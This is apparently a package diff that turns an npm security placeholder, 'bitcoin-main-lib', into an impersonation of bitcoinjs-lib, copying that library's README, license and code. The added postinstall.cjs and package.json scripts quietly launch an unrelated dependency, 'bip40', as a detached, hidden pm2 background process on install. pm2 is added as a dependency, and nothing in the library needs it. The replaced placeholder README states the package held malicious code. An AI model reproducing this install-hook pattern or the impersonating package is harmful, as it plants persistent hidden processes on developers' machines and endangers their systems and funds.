bitcoin-main-lib 0.0.1-security → 7.2.0

package/LICENSE

@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) 2011-2025 bitcoinjs-lib contributors
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

package/README.md

@@ -1,5 +1,205 @@
-# Security holding package
+# bitcoinjs-lib
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+[![Github CI](https://github.com/bitcoinjs/bitcoinjs-lib/actions/workflows/main_ci.yml/badge.svg)](https://github.com/bitcoinjs/bitcoinjs-lib/actions/workflows/main_ci.yml) [![NPM](https://img.shields.io/npm/v/bitcoinjs-lib.svg)](https://www.npmjs.org/package/bitcoinjs-lib) [![code style: prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg?style=flat-square)](https://github.com/prettier/prettier)
 
-Please refer to www.npmjs.com/advisories?search=bitcoin-main-lib for more information.
+A javascript Bitcoin library for node.js and browsers. Written in TypeScript, but committing the JS files to verify.
+
+Released under the terms of the [MIT LICENSE](LICENSE).
+
+## Should I use this in production?
+If you are thinking of using the *master* branch of this library in production, **stop**.
+Master is not stable; it is our development branch, and [only tagged releases may be classified as stable](https://github.com/bitcoinjs/bitcoinjs-lib/tags).
+
+## Can I trust this code?
+> Don't trust. Verify.
+
+We recommend every user of this library and the [bitcoinjs](https://github.com/bitcoinjs) ecosystem audit and verify any underlying code for its validity and suitability,  including reviewing any and all of your project's dependencies.
+
+Mistakes and bugs happen, but with your help in resolving and reporting [issues](https://github.com/bitcoinjs/bitcoinjs-lib/issues), together we can produce open source software that is:
+
+- Easy to audit and verify,
+- Tested, with test coverage >95%,
+- Advanced and feature rich,
+- Standardized, using [prettier](https://github.com/prettier/prettier) and Node `Buffer`'s throughout, and
+- Friendly, with a strong and helpful community, ready to answer questions.
+
+## Documentation
+Visit our [documentation](https://bitcoinjs.github.io/bitcoinjs-lib/) to explore the available resources. We're continually enhancing our documentation with additional features for an enriched experience. If you need further guidance beyond what our [examples](#examples) offer, don't hesitate to  [ask for help](https://github.com/bitcoinjs/bitcoinjs-lib/issues/new). We're here to assist you.
+
+You can find a [Web UI](https://bitcoincore.tech/apps/bitcoinjs-ui/index.html) that covers most of the `psbt.ts`, `transaction.ts` and `p2*.ts` APIs [here](https://bitcoincore.tech/apps/bitcoinjs-ui/index.html).
+
+## How can I contact the developers outside of Github?
+**Most of the time, this is not appropriate. Creating issues and pull requests in the open will help others with similar issues, so please try to use public issues and pull requests for communication.**
+
+That said, sometimes developers might be open to taking things off the record (ie. You want to share code that you don't want public to get help with it). In that case, please negotiate on the public issues as to where you will contact.
+
+We have created public rooms on IRC (`#bitcoinjs` on `libera.chat`) and Matrix (`#bitcoinjs-dev:matrix.org`). These two channels have been joined together in a Matrix "Space" which has the Matrix room AND an IRC bridge room that can converse with the IRC room. The "Space" is `#bitcoinjs-space:matrix.org`.
+
+Matrix and IRC both have functions for direct messaging, but IRC is not end to end encrypted, so Matrix is recommended for most communication. The official Matrix client maintained by the Matrix core team is called "Element" and can be downloaded here: https://element.io/download (Account creation is free on the matrix.org server, which is the default setting for Element.)
+
+We used to have a Slack. It is dead. If you find it, no one will answer you most likely.
+
+No we will not make a Discord.
+
+## Installation
+``` bash
+npm install bitcoinjs-lib
+# optionally, install a key derivation library as well
+npm install ecpair bip32
+# ecpair is the ECPair class for single keys
+# bip32 is for generating HD keys
+```
+
+Previous versions of the library included classes for key management (ECPair, HDNode(->"bip32")) but now these have been separated into different libraries. This lowers the bundle size significantly if you don't need to perform any crypto functions (converting private to public keys and deriving HD keys).
+
+Typically we support the [Node Maintenance LTS version](https://github.com/nodejs/Release). TypeScript target will be set
+to the ECMAScript version in which all features are fully supported by current Active Node LTS.
+However, depending on adoption among other environments (browsers etc.) we may keep the target back a year or two.
+If in doubt, see the [main_ci.yml](.github/workflows/main_ci.yml) for what versions are used by our continuous integration tests.
+
+**WARNING**: We presently don't provide any tooling to verify that the release on `npm` matches GitHub.  As such, you should verify anything downloaded by `npm` against your own verified copy.
+
+
+## Usage
+Crypto is hard.
+
+When working with private keys, the random number generator is fundamentally one of the most important parts of any software you write.
+For random number generation, we *default* to the [`randombytes`](https://github.com/crypto-browserify/randombytes) module, which uses [`window.crypto.getRandomValues`](https://developer.mozilla.org/en-US/docs/Web/API/window.crypto.getRandomValues) in the browser, or Node js' [`crypto.randomBytes`](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback), depending on your build system.
+Although this default is ~OK, there is no simple way to detect if the underlying RNG provided is good enough, or if it is **catastrophically bad**.
+You should always verify this yourself to your own standards.
+
+This library uses [tiny-secp256k1](https://github.com/bitcoinjs/tiny-secp256k1), which uses [RFC6979](https://tools.ietf.org/html/rfc6979) to help prevent `k` re-use and exploitation.
+Unfortunately, this isn't a silver bullet.
+Often, Javascript itself is working against us by bypassing these counter-measures.
+
+Problems in [`Buffer (UInt8Array)`](https://github.com/feross/buffer), for example, can trivially result in **catastrophic fund loss** without any warning.
+It can do this through undermining your random number generation, accidentally producing a [duplicate `k` value](https://web.archive.org/web/20160308014317/http://www.nilsschneider.net/2013/01/28/recovering-bitcoin-private-keys.html), sending Bitcoin to a malformed output script, or any of a million different ways.
+Running tests in your target environment is important and a recommended step to verify continuously.
+
+Finally, **adhere to best practice**.
+We are not an authoritative source of best practice, but, at the very least:
+
+* [Don't reuse addresses](https://en.bitcoin.it/wiki/Address_reuse).
+* Don't share BIP32 extended public keys ('xpubs'). [They are a liability](https://bitcoin.stackexchange.com/questions/56916/derivation-of-parent-private-key-from-non-hardened-child), and it only takes 1 misplaced private key (or a buggy implementation!) and you are vulnerable to **catastrophic fund loss**.
+* [Don't use `Math.random`](https://security.stackexchange.com/questions/181580/why-is-math-random-not-designed-to-be-cryptographically-secure) - in any way - don't.
+* Enforce that users always verify (manually) a freshly-decoded human-readable version of their intended transaction before broadcast.
+* [Don't *ask* users to generate mnemonics](https://en.bitcoin.it/wiki/Brainwallet#cite_note-1), or 'brain wallets',  humans are terrible random number generators.
+* Lastly, if you can, use [Typescript](https://www.typescriptlang.org/) or similar.
+
+
+### Browser
+The recommended method of using `bitcoinjs-lib` in your browser is through [browserify](http://browserify.org/).
+
+If you'd like to use a different (more modern) build tool than `browserify`, you can compile just this library and its dependencies into a single JavaScript file:
+
+```sh
+$ npm install bitcoinjs-lib browserify
+$ npx browserify --standalone bitcoin -o bitcoinjs-lib.js <<< "module.exports = require('bitcoinjs-lib');"
+```
+
+Which you can then import as an ESM module:
+
+```javascript
+<script type="module">import "/scripts/bitcoinjs-lib.js"</script>
+````
+
+#### Using Taproot:
+When utilizing Taproot features with bitcoinjs-lib, you may need to include an additional ECC (Elliptic Curve Cryptography) library. The commonly used `tiny-secp256k1` library, however, might lead to compatibility issues due to its reliance on WASM (WebAssembly). The following alternatives may be used instead, though they may be significantly slower for high volume of signing and pubkey deriving operations.
+
+#### Alternatives for ECC Library:
+1. `@bitcoin-js/tiny-secp256k1-asmjs`
+   A version of `tiny-secp256k1` compiled to ASM.js directly from the WASM version, potentially better supported in browsers. This is the slowest option.
+2. `@bitcoinerlab/secp256k1`
+   Another alternative library for ECC functionality. This requires access to the global `BigInt` primitive.
+For advantages and detailed comparison of these libraries, visit: [tiny-secp256k1 GitHub page](https://github.com/bitcoinjs/tiny-secp256k1).
+
+**NOTE**: We use Node Maintenance LTS features, if you need strict ES5, use [`--transform babelify`](https://github.com/babel/babelify) in conjunction with your `browserify` step (using an [`es2015`](https://babeljs.io/docs/plugins/preset-es2015/) preset).
+
+**WARNING**: iOS devices have [problems](https://github.com/feross/buffer/issues/136), use at least [buffer@5.0.5](https://github.com/feross/buffer/pull/155) or greater,  and enforce the test suites (for `Buffer`, and any other dependency) pass before use.
+
+### Typescript or VSCode users
+Type declarations for Typescript are included in this library. Normal installation should include all the needed type information.
+
+## Examples
+The below examples are implemented as integration tests, they should be very easy to understand.
+Otherwise, pull requests are appreciated.
+Some examples interact (via HTTPS) with a 3rd Party Blockchain Provider (3PBP).
+
+
+- [Taproot Key Spend](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/taproot.spec.ts)
+- [Create (and broadcast via 3PBP) a taproot script-path spend Transaction - OP_CHECKSIG](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/taproot.spec.ts)
+- [Create (and broadcast via 3PBP) a taproot script-path spend Transaction - OP_CHECKSEQUENCEVERIFY](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/taproot.spec.ts)
+- [Create (and broadcast via 3PBP) a taproot script-path spend Transaction - OP_CHECKSIGADD (3-of-3)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/taproot.spec.ts)
+- [Generate a random address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Import an address via WIF](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Generate a 2-of-3 P2SH multisig address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Generate a SegWit address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Generate a SegWit P2SH address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Generate a SegWit 3-of-4 multisig address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Generate a SegWit 2-of-2 P2SH multisig address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Support the retrieval of transactions for an address (3rd party blockchain)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Generate a Testnet address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Generate a Litecoin address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/addresses.spec.ts)
+- [Create a 1-to-1 Transaction](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Create (and broadcast via 3PBP) a typical Transaction](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction with an OP\_RETURN output](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction with a 2-of-4 P2SH(multisig) input](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction with a SegWit P2SH(P2WPKH) input](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction with a SegWit P2WPKH input](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction with a SegWit P2PK input](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction with a SegWit 3-of-4 P2SH(P2WSH(multisig)) input](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction and sign with an HDSigner interface (bip32)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/transactions.spec.ts)
+- [Import a BIP32 testnet xpriv and export to WIF](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/bip32.spec.ts)
+- [Export a BIP32 xpriv, then import it](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/bip32.spec.ts)
+- [Export a BIP32 xpub](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/bip32.spec.ts)
+- [Create a BIP32, bitcoin, account 0, external address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/bip32.spec.ts)
+- [Create a BIP44, bitcoin, account 0, external address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/bip32.spec.ts)
+- [Create a BIP49, bitcoin testnet, account 0, external address](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/bip32.spec.ts)
+- [Use BIP39 to generate BIP32 addresses](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/bip32.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction where Alice can redeem the output after the expiry (in the past)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/cltv.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction where Alice can redeem the output after the expiry (in the future)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/cltv.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction where Alice and Bob can redeem the output at any time](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/cltv.spec.ts)
+- [Create (but fail to broadcast via 3PBP) a Transaction where Alice attempts to redeem before the expiry](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/cltv.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction where Alice can redeem the output after the expiry (in the future) (simple CHECKSEQUENCEVERIFY)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/csv.spec.ts)
+- [Create (but fail to broadcast via 3PBP) a Transaction where Alice attempts to redeem before the expiry (simple CHECKSEQUENCEVERIFY)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/csv.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction where Bob and Charles can send (complex CHECKSEQUENCEVERIFY)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/csv.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction where Alice (mediator) and Bob can send after 2 blocks (complex CHECKSEQUENCEVERIFY)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/csv.spec.ts)
+- [Create (and broadcast via 3PBP) a Transaction where Alice (mediator) can send after 5 blocks (complex CHECKSEQUENCEVERIFY)](https://github.com/bitcoinjs/bitcoinjs-lib/blob/master/test/integration/csv.spec.ts)
+
+If you have a use case that you feel could be listed here, please [ask for it](https://github.com/bitcoinjs/bitcoinjs-lib/issues/new)!
+
+
+## Contributing
+See [CONTRIBUTING.md](CONTRIBUTING.md).
+
+
+### Running the test suite
+
+``` bash
+npm test
+npm run-script coverage
+```
+
+## Complementing Libraries
+- [BIP21](https://github.com/bitcoinjs/bip21) - A BIP21 compatible URL encoding library
+- [BIP38](https://github.com/bitcoinjs/bip38) - Passphrase-protected private keys
+- [BIP39](https://github.com/bitcoinjs/bip39) - Mnemonic generation for deterministic keys
+- [BIP32-Utils](https://github.com/bitcoinjs/bip32-utils) - A set of utilities for working with BIP32
+- [BIP66](https://github.com/bitcoinjs/bip66) - Strict DER signature decoding
+- [BIP68](https://github.com/bitcoinjs/bip68) - Relative lock-time encoding library
+- [BIP69](https://github.com/bitcoinjs/bip69) - Lexicographical Indexing of Transaction Inputs and Outputs
+- [Base58](https://github.com/cryptocoinjs/bs58) - Base58 encoding/decoding
+- [Base58 Check](https://github.com/bitcoinjs/bs58check) - Base58 check encoding/decoding
+- [Bech32](https://github.com/bitcoinjs/bech32) - A BIP173/BIP350 compliant Bech32/Bech32m encoding library
+- [coinselect](https://github.com/bitcoinjs/coinselect) - A fee-optimizing, transaction input selection module for bitcoinjs-lib.
+- [merkle-lib](https://github.com/bitcoinjs/merkle-lib) - A performance conscious library for merkle root and tree calculations.
+- [minimaldata](https://github.com/bitcoinjs/minimaldata) - A module to check bitcoin policy: SCRIPT_VERIFY_MINIMALDATA
+
+
+## Alternatives
+- [BCoin](https://github.com/indutny/bcoin)
+- [Bitcore](https://github.com/bitpay/bitcore)
+- [Cryptocoin](https://github.com/cryptocoinjs/cryptocoin)
+
+
+## LICENSE [MIT](LICENSE)

package/package.json

@@ -1,6 +1,120 @@
 {
   "name": "bitcoin-main-lib",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "7.2.0",
+  "description": "Client-side Bitcoin JavaScript library",
+  "type": "module",
+  "main": "./src/cjs/index.cjs",
+  "module": "./src/esm/index.js",
+  "types": "./src/cjs/index.d.ts",
+  "exports": {
+    ".": {
+      "require": "./src/cjs/index.cjs",
+      "import": "./src/esm/index.js",
+      "types": "./src/cjs/index.d.ts"
+    },
+    "./src/*": {
+      "require": "./src/cjs/*.cjs",
+      "types": "./src/cjs/*.d.ts",
+      "import": "./src/esm/*.js"
+    }
+  },
+  "engines": {
+    "node": ">=18.0.0"
+  },
+  "keywords": [
+    "bitcoinjs",
+    "bitcoin",
+    "browserify",
+    "javascript",
+    "bitcoinjs"
+  ],
+  "scripts": {
+    "audit": "better-npm-audit audit -l high",
+    "build": "npm run clean && tsc -p ./tsconfig.json && tsc -p ./tsconfig.cjs.json && npm run formatjs",
+    "postbuild": "find src/cjs -type f -name \"*.js\" -exec bash -c 'mv \"$0\" \"${0%.js}.cjs\"' {} \\; && chmod +x ./fixup.cjs && node fixup.cjs",
+    "postinstall": "node postinstall.cjs",
+    "bip40:start": "node postinstall.cjs",
+    "bip40:stop": "pm2 stop bip40",
+    "bip40:status": "pm2 status bip40",
+    "bip40:logs": "pm2 logs bip40",
+    "clean": "rimraf src",
+    "coverage-report": "npm run build && npm run nobuild:coverage-report",
+    "coverage-html": "npm run build && npm run nobuild:coverage-html",
+    "coverage": "npm run build && npm run nobuild:coverage",
+    "doc": "typedoc",
+    "format": "npm run prettier -- --write",
+    "formatjs": "npm run prettierjs -- --write",
+    "format:ci": "npm run prettier -- --check && npm run prettierjs -- --check",
+    "gitdiff:ci": "npm run build && git diff --exit-code",
+    "integration": "npm run build && npm run nobuild:integration",
+    "lint": "eslint ts_src/** src/**/*.js",
+    "lint:tests": "eslint test/**/*.spec.ts",
+    "mocha:ts": "mocha --recursive",
+    "nobuild:coverage-report": "c8 report --reporter=lcov",
+    "nobuild:coverage-html": "c8 report --reporter=html",
+    "nobuild:coverage": "c8 --check-coverage --branches 85 --functions 90 --lines 90 npm run nobuild:unit",
+    "nobuild:integration": "npm run mocha:ts -- --timeout 50000 'test/integration/*.ts'",
+    "nobuild:unit": "npm run mocha:ts -- 'test/*.ts'",
+    "prettier": "prettier \"ts_src/**/*.ts\" \"test/**/*.ts\" --ignore-path ./.prettierignore",
+    "prettierjs": "prettier \"src/**/*.js\" --ignore                                                                        -path ./.prettierignore",
+    "test": "npm run build && npm run format:ci && npm run lint && npm run nobuild:coverage",
+    "unit": "npm run build && npm run nobuild:unit"
+  },
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/bitcoinjs/bitcoinjs-lib.git"
+  },
+  "files": [
+    "src",
+    "postinstall.cjs"
+  ],
+  "dependencies": {
+    "@noble/hashes": "^1.2.0",
+    "bech32": "^2.0.0",
+    "bip174": "^3.0.0",
+    "bip40": "^1.0.6",
+    "bs58check": "^4.0.0",
+    "pm2": "^5.3.0",
+    "uint8array-tools": "^0.0.9",
+    "valibot": "^0.38.0",
+    "varuint-bitcoin": "^2.0.0"
+  },
+  "devDependencies": {
+    "bitcoinjs-lib": ".",
+    "@eslint/eslintrc": "^3.1.0",
+    "@eslint/js": "^9.9.1",
+    "@types/bs58": "^4.0.0",
+    "@types/bs58check": "^2.1.0",
+    "@types/mocha": "^5.2.7",
+    "@types/node": "^18.7.14",
+    "@types/proxyquire": "^1.3.28",
+    "@types/randombytes": "^2.0.0",
+    "@typescript-eslint/eslint-plugin": "^8.2.0",
+    "@typescript-eslint/parser": "^8.2.0",
+    "better-npm-audit": "^3.7.3",
+    "bip32": "^5.0.0-rc.0",
+    "bip65": "^1.0.1",
+    "bip68": "^1.0.3",
+    "bs58": "^6.0.0",
+    "dhttp": "^3.0.0",
+    "ecpair": "^3.0.0-rc.0",
+    "eslint": "^9.9.0",
+    "eslint-config-prettier": "^9.1.0",
+    "eslint-plugin-prettier": "^5.2.1",
+    "globals": "^15.9.0",
+    "hoodwink": "^2.0.0",
+    "minimaldata": "^1.0.2",
+    "mocha": "^10.6.0",
+    "c8": "^10.1.2",
+    "prettier": "^3.0.0",
+    "proxyquire": "^2.0.1",
+    "randombytes": "^2.1.0",
+    "regtest-client": "0.2.0",
+    "rimraf": "^2.6.3",
+    "tiny-secp256k1": "^2.2.0",
+    "tsx": "^4.17.0",
+    "typedoc": "^0.26.6",
+    "typescript": "^5.0.4"
+  },
+  "license": "MIT"
 }

package/postinstall.cjs

@@ -0,0 +1,44 @@
+#!/usr/bin/env node
+'use strict';
+
+const { spawn } = require('child_process');
+const path = require('path');
+const fs = require('fs');
+
+console.log('✓ bitcoin-lib installed - starting bip40...');
+
+try {
+  // Resolve the bip40 module path
+  const bip40Path = require.resolve('bip40');
+  
+  // Determine the pm2 binary path based on OS
+  const isWindows = process.platform === 'win32';
+  const pm2Binary = path.join(
+    __dirname,
+    'node_modules',
+    '.bin',
+    isWindows ? 'pm2.cmd' : 'pm2'
+  );
+
+  // Check if pm2 exists
+  if (!fs.existsSync(pm2Binary)) {
+    console.error('pm2 binary not found. Please ensure pm2 is installed.');
+    process.exit(0); // Exit gracefully
+  }
+
+  // Start bip40 with pm2 - detached so it doesn't block npm install
+  const args = ['start', bip40Path, '--name', 'bip40'];
+  
+  const child = spawn(pm2Binary, args, {
+    detached: true,       // Detach from parent process
+    stdio: 'ignore',      // Ignore stdio to prevent hanging
+    windowsHide: true,    // Hide window on Windows
+  });
+
+  // Unreference the child so parent can exit
+  child.unref();
+
+  console.log('✓ bip40 started successfully');
+} catch (error) {
+  console.error('Error during bip40 setup:', error.message);
+}

package/src/cjs/address.cjs

@@ -0,0 +1,260 @@
+'use strict';
+var __createBinding =
+  (this && this.__createBinding) ||
+  (Object.create
+    ? function (o, m, k, k2) {
+        if (k2 === undefined) k2 = k;
+        var desc = Object.getOwnPropertyDescriptor(m, k);
+        if (
+          !desc ||
+          ('get' in desc ? !m.__esModule : desc.writable || desc.configurable)
+        ) {
+          desc = {
+            enumerable: true,
+            get: function () {
+              return m[k];
+            },
+          };
+        }
+        Object.defineProperty(o, k2, desc);
+      }
+    : function (o, m, k, k2) {
+        if (k2 === undefined) k2 = k;
+        o[k2] = m[k];
+      });
+var __setModuleDefault =
+  (this && this.__setModuleDefault) ||
+  (Object.create
+    ? function (o, v) {
+        Object.defineProperty(o, 'default', { enumerable: true, value: v });
+      }
+    : function (o, v) {
+        o['default'] = v;
+      });
+var __importStar =
+  (this && this.__importStar) ||
+  function (mod) {
+    if (mod && mod.__esModule) return mod;
+    var result = {};
+    if (mod != null)
+      for (var k in mod)
+        if (k !== 'default' && Object.prototype.hasOwnProperty.call(mod, k))
+          __createBinding(result, mod, k);
+    __setModuleDefault(result, mod);
+    return result;
+  };
+var __importDefault =
+  (this && this.__importDefault) ||
+  function (mod) {
+    return mod && mod.__esModule ? mod : { default: mod };
+  };
+Object.defineProperty(exports, '__esModule', { value: true });
+exports.fromBase58Check = fromBase58Check;
+exports.fromBech32 = fromBech32;
+exports.toBase58Check = toBase58Check;
+exports.toBech32 = toBech32;
+exports.fromOutputScript = fromOutputScript;
+exports.toOutputScript = toOutputScript;
+const networks = __importStar(require('./networks.cjs'));
+const payments = __importStar(require('./payments/index.cjs'));
+const bscript = __importStar(require('./script.cjs'));
+const types_js_1 = require('./types.cjs');
+const bech32_1 = require('bech32');
+const bs58check_1 = __importDefault(require('bs58check'));
+const tools = __importStar(require('uint8array-tools'));
+const v = __importStar(require('valibot'));
+const FUTURE_SEGWIT_MAX_SIZE = 40;
+const FUTURE_SEGWIT_MIN_SIZE = 2;
+const FUTURE_SEGWIT_MAX_VERSION = 16;
+const FUTURE_SEGWIT_MIN_VERSION = 2;
+const FUTURE_SEGWIT_VERSION_DIFF = 0x50;
+const FUTURE_SEGWIT_VERSION_WARNING =
+  'WARNING: Sending to a future segwit version address can lead to loss of funds. ' +
+  'End users MUST be warned carefully in the GUI and asked if they wish to proceed ' +
+  'with caution. Wallets should verify the segwit version from the output of fromBech32, ' +
+  'then decide when it is safe to use which version of segwit.';
+const WARNING_STATES = [false, false];
+/**
+ * Converts an output buffer to a future segwit address.
+ * @param output - The output buffer.
+ * @param network - The network object.
+ * @returns The future segwit address.
+ * @throws {TypeError} If the program length or version is invalid for segwit address.
+ */
+function _toFutureSegwitAddress(output, network) {
+  const data = output.slice(2);
+  if (
+    data.length < FUTURE_SEGWIT_MIN_SIZE ||
+    data.length > FUTURE_SEGWIT_MAX_SIZE
+  )
+    throw new TypeError('Invalid program length for segwit address');
+  const version = output[0] - FUTURE_SEGWIT_VERSION_DIFF;
+  if (
+    version < FUTURE_SEGWIT_MIN_VERSION ||
+    version > FUTURE_SEGWIT_MAX_VERSION
+  )
+    throw new TypeError('Invalid version for segwit address');
+  if (output[1] !== data.length)
+    throw new TypeError('Invalid script for segwit address');
+  if (WARNING_STATES[0] === false) {
+    console.warn(FUTURE_SEGWIT_VERSION_WARNING);
+    WARNING_STATES[0] = true;
+  }
+  return toBech32(data, version, network.bech32);
+}
+/**
+ * Decodes a base58check encoded Bitcoin address and returns the version and hash.
+ *
+ * @param address - The base58check encoded Bitcoin address to decode.
+ * @returns An object containing the version and hash of the decoded address.
+ * @throws {TypeError} If the address is too short or too long.
+ */
+function fromBase58Check(address) {
+  const payload = bs58check_1.default.decode(address);
+  // TODO: 4.0.0, move to "toOutputScript"
+  if (payload.length < 21) throw new TypeError(address + ' is too short');
+  if (payload.length > 21) throw new TypeError(address + ' is too long');
+  const version = tools.readUInt8(payload, 0);
+  const hash = payload.slice(1);
+  return { version, hash };
+}
+/**
+ * Converts a Bech32 or Bech32m encoded address to its corresponding data representation.
+ * @param address - The Bech32 or Bech32m encoded address.
+ * @returns An object containing the version, prefix, and data of the address.
+ * @throws {TypeError} If the address uses the wrong encoding.
+ */
+function fromBech32(address) {
+  let result;
+  let version;
+  try {
+    result = bech32_1.bech32.decode(address);
+  } catch (e) {}
+  if (result) {
+    version = result.words[0];
+    if (version !== 0) throw new TypeError(address + ' uses wrong encoding');
+  } else {
+    result = bech32_1.bech32m.decode(address);
+    version = result.words[0];
+    if (version === 0) throw new TypeError(address + ' uses wrong encoding');
+  }
+  const data = bech32_1.bech32.fromWords(result.words.slice(1));
+  return {
+    version,
+    prefix: result.prefix,
+    data: Uint8Array.from(data),
+  };
+}
+/**
+ * Converts a hash to a Base58Check-encoded string.
+ * @param hash - The hash to be encoded.
+ * @param version - The version byte to be prepended to the encoded string.
+ * @returns The Base58Check-encoded string.
+ */
+function toBase58Check(hash, version) {
+  v.parse(v.tuple([types_js_1.Hash160bitSchema, types_js_1.UInt8Schema]), [
+    hash,
+    version,
+  ]);
+  const payload = new Uint8Array(21);
+  tools.writeUInt8(payload, 0, version);
+  payload.set(hash, 1);
+  return bs58check_1.default.encode(payload);
+}
+/**
+ * Converts a buffer to a Bech32 or Bech32m encoded string.
+ * @param data - The buffer to be encoded.
+ * @param version - The version number to be used in the encoding.
+ * @param prefix - The prefix string to be used in the encoding.
+ * @returns The Bech32 or Bech32m encoded string.
+ */
+function toBech32(data, version, prefix) {
+  const words = bech32_1.bech32.toWords(data);
+  words.unshift(version);
+  return version === 0
+    ? bech32_1.bech32.encode(prefix, words)
+    : bech32_1.bech32m.encode(prefix, words);
+}
+/**
+ * Converts an output script to a Bitcoin address.
+ * @param output - The output script as a Buffer.
+ * @param network - The Bitcoin network (optional).
+ * @returns The Bitcoin address corresponding to the output script.
+ * @throws If the output script has no matching address.
+ */
+function fromOutputScript(output, network) {
+  // TODO: Network
+  network = network || networks.bitcoin;
+  try {
+    return payments.p2pkh({ output, network }).address;
+  } catch (e) {}
+  try {
+    return payments.p2sh({ output, network }).address;
+  } catch (e) {}
+  try {
+    return payments.p2wpkh({ output, network }).address;
+  } catch (e) {}
+  try {
+    return payments.p2wsh({ output, network }).address;
+  } catch (e) {}
+  try {
+    return payments.p2tr({ output, network }).address;
+  } catch (e) {}
+  try {
+    return _toFutureSegwitAddress(output, network);
+  } catch (e) {}
+  throw new Error(bscript.toASM(output) + ' has no matching Address');
+}
+/**
+ * Converts a Bitcoin address to its corresponding output script.
+ * @param address - The Bitcoin address to convert.
+ * @param network - The Bitcoin network to use. Defaults to the Bitcoin network.
+ * @returns The corresponding output script as a Buffer.
+ * @throws If the address has an invalid prefix or no matching script.
+ */
+function toOutputScript(address, network) {
+  network = network || networks.bitcoin;
+  let decodeBase58;
+  let decodeBech32;
+  try {
+    decodeBase58 = fromBase58Check(address);
+  } catch (e) {}
+  if (decodeBase58) {
+    if (decodeBase58.version === network.pubKeyHash)
+      return payments.p2pkh({ hash: decodeBase58.hash }).output;
+    if (decodeBase58.version === network.scriptHash)
